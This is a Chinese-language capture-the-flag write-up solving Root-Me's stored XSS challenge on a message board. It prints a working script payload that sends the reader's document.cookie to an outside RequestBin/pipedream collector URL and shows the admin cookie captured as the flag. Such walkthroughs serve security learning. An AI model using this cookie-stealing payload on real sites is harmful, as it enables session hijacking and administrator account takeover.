「CTF」RootMe解題筆記 – Web-Client : XSS – Stored 1

Root-Me官方網站:https://www.root-me.org 這題可以從題目直接判斷出此題為xss儲存型漏洞 頁面為一個留言板的配置 經過測試之後得知<img>標籤可以正常地被執行,於是插入<img src=000>             並且打開開發者管理工具可以發現,此網站並無使用HttpOnly屬性 代表著JavaScript代碼可以被執行進而達成xss的漏洞利用 並且輸入<img src="000" />就可以得到本機的cookie       OK […]

Root-Me官方網站:https://www.root-me.org

這題可以從題目直接判斷出此題為xss儲存型漏洞

頁面為一個留言板的配置

經過測試之後得知<img>標籤可以正常地被執行,於是插入<img src=000>

 

 

 

 

 

 

並且打開開發者管理工具可以發現,此網站並無使用HttpOnly屬性
代表著JavaScript代碼可以被執行進而達成xss的漏洞利用

並且輸入<img src="000" />就可以得到本機的cookie

 

 

 

OK!真是太棒了,那麼接下來我們要做的就是把xss的payload儲存到管理後台,當管理員讀取這條消息的時候就會執行我們的惡意代碼,間接的將管理員的cookie發到我們指定的server

ps:此題目有一個自動讀取訊息的robot,已讀過後的訊息會自動刪除


payload:<script>document.write("<img src=${server}?tk="+document.cookie+" />");</script>

對於${server},推薦使用RequestBin生成的臨時HTTP server。假設你生成的HTTP server臨時url為https://enk76i1gl5dqi.x.pipedream.net/,則把payload修改成:


payload:<script>document.write("<img src=https://enk76i1gl5dqi.x.pipedream.net?tk="+document.cookie+" />");</script>

 

最後收到的cooke為:ADMIN_COOKIE=NkI9qe4cdLIO2P7MIsWS8ofD6,這就是flag,完成挑戰!
在現實生活中駭客就能使用管理員的cookie在沒有管理員帳號密碼的狀況下成功登入後台

推薦文章:

HttpOnly – HTTP Headers 的資安議題 (3)

發佈留言

發佈留言必須填寫的電子郵件地址不會公開。 必填欄位標示為 *